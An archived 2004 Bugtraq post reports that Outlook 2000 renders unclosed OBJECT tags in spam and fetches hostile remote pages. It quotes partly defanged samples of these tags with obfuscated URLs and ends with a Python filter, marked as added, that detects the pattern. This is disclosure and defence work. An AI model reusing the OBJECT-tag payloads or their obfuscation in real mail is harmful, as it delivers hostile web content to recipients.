Bugtraq mailing list archives
OBJECT Bugs or Features
From: "James C Slora Jr" <Jim.Slora () phra com>
Date: Mon, 7 Jun 2004 16:15:47 -0400
Two questions about the recent OBJECT tag assault in spam messages:

1. Should an email client process an OBJECT tag that has no corresponding /OBJECT?
2. Should an email client process an OBJECT tag that is not even embedded within HTML tags?

Apparently the current answer in Outlook is Yes. Two examples below leap to the Web to download very hostile pages from fully patched, fully updated Outlook 2000. I have not tested in other versions, but the volume of the incoming spam with these tags suggests other versions are vulnerable too.

I don't think this is new ground, but it is very much wild now.

~ inserted in key places to reduce "you sent me spam" notices.

From: "Yesenia Edwards" <YMNUDEWDQHFZWU () yahoo com>
To: <blah () blah blah>
Subject: the email from 2 days ago.. here is my replay..
Date: Mon, 07 Jun 2004 13:29:40 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="--6941203962437317574"

----6941203962437317574
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

~object data=3D"http://www.seductiveones.~biz/easy/orrorr/sock/page.~php"~=20
----6941203962437317574--

Many other messages have Object tags that look like this:

~object = data=3D"http://www.= 19;ildwincasino= .net/page.php= ;"~

Note they mix "=" and "=3D" in addition to not closing the OBJECT tag. The hostile site URL is often obfuscated through ASCII HTML encoding.
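A mail-filter check for the pattern described in this message, as an added example that is not part of the original post: it decodes each text part's quoted-printable encoding and HTML character references, then reports any OBJECT tag whose data attribute points at a remote URL, whether or not the tag is closed or wrapped in HTML. The function names, addresses, boundary and host below are constructed placeholders.

```python
import email
import html
import re
from email import policy

# An <object ...> opener; a closing '>' or </object> is deliberately NOT required.
OBJECT_OPEN = re.compile(r"<\s*object\b([^>]*)", re.I)
# data= attribute pointing at a remote http(s) or scheme-relative URL.
REMOTE_DATA = re.compile(r"""\bdata\s*=\s*["']?\s*((?:https?:)?//[^\s"'>]+)""", re.I)

def remote_object_urls(raw: bytes) -> list[str]:
    """Return remote URLs referenced by OBJECT tags in any text part of a message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    urls = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        body = part.get_content()  # undoes quoted-printable (=3D, soft line breaks)
        for tag in OBJECT_OPEN.finditer(body):
            attrs = html.unescape(tag.group(1))  # undoes &#119;-style obfuscation
            match = REMOTE_DATA.search(attrs)
            if match:
                urls.append(match.group(1))
    return urls

def constructed_message(body: bytes) -> bytes:
    """Constructed test message; addresses, boundary and host are placeholders."""
    return b"\r\n".join([
        b"From: sender@example.invalid",
        b"To: rcpt@example.invalid",
        b"Subject: constructed sample",
        b"MIME-Version: 1.0",
        b'Content-Type: multipart/alternative; boundary="b1"',
        b"",
        b"--b1",
        b"Content-Type: text/html",
        b"Content-Transfer-Encoding: quoted-printable",
        b"",
        body,
        b"--b1--",
        b"",
    ])

# Unclosed tag, no surrounding <html>, soft line break, entity-obfuscated host.
SAMPLE = constructed_message(
    b'<object =\r\ndata=3D"http://&#119;ww.example.invalid/page.php"=20')

if __name__ == "__main__":
    print(remote_object_urls(SAMPLE))
```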